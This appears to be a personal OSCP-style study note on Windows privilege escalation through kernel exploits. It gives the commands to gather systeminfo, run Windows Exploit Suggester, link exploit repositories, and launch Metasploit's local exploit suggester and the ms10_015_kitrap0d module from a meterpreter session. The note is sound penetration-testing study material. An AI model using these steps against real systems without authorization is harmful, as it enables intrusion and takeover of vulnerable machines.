// notes/ PrivEsc — Windows
🪟

Kernel Exploits

The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Ke…

#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/kernel-exploits

Kernel Exploits

Overview

The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Kernel (system/core) we become the Kernel >:)

Kernel Version Example

powerquery
01OS Version: 6.1.7600 N/A Build 7600

Kernel Exploits via Windows Exploit Suggester

Pull System Information from machine

code
01systeminfo

Stick into a sysinfo.txt file then update and feed it to Windows Exploit Suggester

bash
$python2.7 windows-exploit-suggester.py -u
abap
01python2.7 windows-exploit-suggester.py -i sysinfo.txt -d 2024-03-02-mssb.xls

Search for the exploits after receiving the results

{% embed url="https://github.com/SecWiki/windows-kernel-exploits" %}

{% embed url="https://github.com/abatchy17/WindowsExploits" %}

Kernel Exploits via Metasploit

Inside of an existing meterpreter shell

bash
$run post/multi/recon/local_exploit_suggester

Choose an exploit based on the ones listed

bash
$background
$exploit/windows/local/ms10_015_kitrap0d
$set session 1
$set lhost tun0
$set lport 5555 (something different from last session)
$exploit